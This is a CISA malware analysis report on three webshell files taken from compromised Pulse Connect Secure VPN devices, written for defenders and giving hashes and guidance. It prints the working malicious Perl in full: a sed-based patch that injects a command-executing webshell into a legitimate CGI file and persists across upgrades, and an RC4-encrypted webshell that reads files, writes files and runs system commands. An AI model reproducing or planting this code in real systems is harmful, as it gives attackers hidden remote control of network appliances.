MAR-10338868-1.v1: Pulse Connect Secure

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Description

Three files were submitted to CISA for analysis. One file consists of shell scripts designed to modify a Pulse Secure Perl Common Gateway Interface (CGI) script file to become a webshell. The other files are capable of allowing a remote operator to read and write files on the target system. This analysis is derived from malicious files found on Pulse Connect Secure devices.

For a downloadable copy of IOCs, see: MAR-10338868-1.v1.WHITE.stix.

Submitted Files (3)

44a8b2187c8d181a73285379b4566ed9d39d4ed208d633dcd0dda67a0a64e2a4 (licenseserverproto.cgi)

85f74424fb4c7dba9f2e9c60a95c8a226a97f7dfc277f5ce6f34862a9f500226 (healthcheck.cgi)

a3b60b4bc4a5c7af525491ba37b570f90405aa83e36655da7d91bd68acaedf85 (DSUpgrade.pm)

a3b60b4bc4a5c7af525491ba37b570f90405aa83e36655da7d91bd68acaedf85

Tags

trojanwebshell

Details

Antivirus

YARA Rules

No matches found.

ssdeep Matches

Description

The file contains malicious code that was patched into the Pulse Secure application.

--Begin Malicious Code--
my $cgi_p="/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi";
my $cmd_x="sed -i '/echo_console \"Saving package\"/i(sed -i \\\'/main();\\\$/cif(CGI::param(\\\\\"id\\\\\")){print \\\\\"Cache-Control: no-cache\\\\\\\\n\\\\\";print \\\\\"Content-type: text/html\\\\\\\\n\\\\\\\\n\\\\\";my \\\\\$na=CGI::param(\\\\\"id\\\\\");system(\\\\\"\\\\\$na\\\");}else{&main();}\\\' /tmp/data/root$cgi_p;cp -f /home/perl/DSUpgrade.pm /tmp/data/root/home/perl;cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)' /pkg/do-install";
system("/bin/mount -o remount,rw /dev/root /");
system("/bin/tar", "-xzf", "/tmp/new-pack.tgz", "-C", "/tmp","./installer");
system("cp -f /tmp/installer/do-install /pkg/");
system("cp -f /tmp/installer/VERSION /pkg/");
system("cp -f /tmp/installer/sysboot-shlib /pkg/");
system("cp -f /tmp/installer/losetup /pkg/");
system("$cmd_x");
system("rm -rf /tmp/installer");
my $td = time - $ts;
my $status = $? % 255;
if ($status == 0) {
   print $html " complete ($td seconds)</li>";
   print $console " complete\r\n";
}
else {
   print $html " failed</li>";
   print $console " failed\r\n";
}

return $status == 0;
}
--End Malicious Code--

The patched in code will leverage the following SED command to patch a malicious webshell into the Pulse Secure system file “/pkg/do-install”:

--Begin Malicious SED Command--
my $cmd_x="sed -i '/echo_console \"Saving package\"/i(sed -i \\\'/main();\\\$/cif(CGI::param(\\\\\"id\\\\\")){print \\\\\"Cache-Control: no-cache\\\\\\\\n\\\\\";print \\\\\"Content-type: text/html\\\\\\\\n\\\\\\\\n\\\\\";my \\\\\$na=CGI::param(\\\\\"id\\\\\");system(\\\\\"\\\\\$na\\\");}else{&main();}\\\' /tmp/data/root$cgi_p;cp -f /home/perl/DSUpgrade.pm /tmp/data/root/home/perl;cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)' /pkg/do-install"
--End Malicious SED Command--

The purpose of the webshell is to accept a parameter named "id" from within an incoming web application post, and also copy another instance of the shell into the parameter '$cgi_p', which resolves to the legitimate file 'licenseserverproto.cgi'. The webshell will then process the data provided within the "id" parameter as an operating system command by executing it locally utilizing the system() function.

85f74424fb4c7dba9f2e9c60a95c8a226a97f7dfc277f5ce6f34862a9f500226

Tags

webshell

Details

Antivirus

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a Pulse Secure CGI script that contains malicious code that was patched into the file. The modification modifies the file to become a webshell. The following code includes comments that provides information on the capabilities of this patched webshell:

--Begin Malicious Code--
use MIME::Base64;
use Crypt::RC4;
my $ph="<REDACTED>";
sub r    ==> Generate random block of data for encryption
{
my $n=$_[0];
my $rs;
for (my $i=0;$i<$n;$i++)
{
my $n1=int(rand(256));
$rs.=chr($n1);
}
return $rs;
}
sub a ==> RC4 and BASE64 encryption function
{
my $st=$_[0];
my $k=r(6);
my $en = RC4( $k.$ph, $st);
return encode_base64($k.$en);
}
sub b ==> RC4 and BASE64 decryption function
{
my $s= decode_base64($_[0]);
my $l=length($s);
my $k= substr($s,0,6);
my $en=substr($s,6,$l-6);
my $de = RC4( $k.$ph, $en );
return $de;
}
sub c ==> Download file from target system
{
my $fi=CGI::param('img');
my $FN=b($fi);
my $fd;
print "Content-type: application/x-download\n";
open(*FILE, "<$FN" );while(<FILE>)
{
$fd=$fd.$_;
}
close(*FILE);
print "Content-Disposition: attachment;
filename=tmp\n\n";
print a($fd);         ==> RC4 encrypted and BASE64 encode file before sending it to operator
}
sub d    ==> Decrypt and writes out file
{
print "Cache-Control: no-cache\n";
print "Content-type: text/html\n\n";
my $fi = CGI::param('cert');    ==> Md5 is the output file contains the file to be written
$fi=b($fi);
my $pa=CGI::param('md5'); ==> it contains the data to be written to file
$pa=b($pa);
open (*outfile, ">$pa");
print outfile $fi;     ==> data content is written to file
close (*outfile);
}
sub e         ==> decrypt and execute system command provided
{
print "Cache-Control: no-cache\n";
print "Content-type: image/gif\n\n";
my $na=CGI::param('name');
$na=b($na);             ==> incoming command is BASE64 decoded and RC4 decrypted
my $rt;
if (!$na or $na eq "cd")
{
$rt="Error 404";
}
else
{
my $ot="/tmp/1";
system("$na >/tmp/1 2>&1");     ==> Execute decrypted command
open(*cmd_result,"<$ot");
while(<cmd_result>)
{
$rt=$rt.$_;
}
close(*cmd_result);
unlink $ot
}
print a($rt);
}
sub f
{
if(CGI::param('cert'))
{
d();
}
elsif(CGI::param('img') and CGI::param('name'))
{
c();
}
elsif(CGI::param('name') and CGI::param('img') eq "")
{
e();     ==> Decrypt and execute system command provided
}
else
{
&main();
}
}
if ($ENV{'REQUEST_METHOD'} eq "POST")
{
f();
}
else
{
&main();
}
--End Malicious Code--

The webshell is capable of allowing a remote operator to read and write files on the target system. It is also capable of allowing the remote operator to pass system commands to the target system which will be executed as system commands. The data passed to and from this webshell by the remote operator will be RC4 encrypted with a hard coded RC4 key.

44a8b2187c8d181a73285379b4566ed9d39d4ed208d633dcd0dda67a0a64e2a4

Tags

webshell

Details

Antivirus

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a Pulse Secure CGI script with malicious code patched in. This file and "healthcheck.cgi" (85f74424fb4c7dba9f2e9c60a95c8a226a97f7dfc277f5ce6f34862a9f500226) have the same malicious code patched in. This file contains a different hard-coded RC4 key for encryption.

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

• Maintain up-to-date antivirus signatures and engines.
• Keep operating system patches up-to-date.
• Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
• Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
• Enforce a strong password policy and implement regular password changes.
• Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
• Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
• Disable unnecessary services on agency workstations and servers.
• Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
• Monitor users' web browsing habits; restrict access to sites with unfavorable content.
• Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
• Scan all software downloaded from the Internet prior to executing.
• Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

• 1-888-282-0870
• CISA Service Desk (UNCLASS)
• CISA SIPR (SIPRNET)
• CISA IC (JWICS)

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

• Web: https://malware.us-cert.gov
• E-Mail: submit@malware.us-cert.gov
• FTP: ftp.malware.us-cert.gov (anonymous)

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.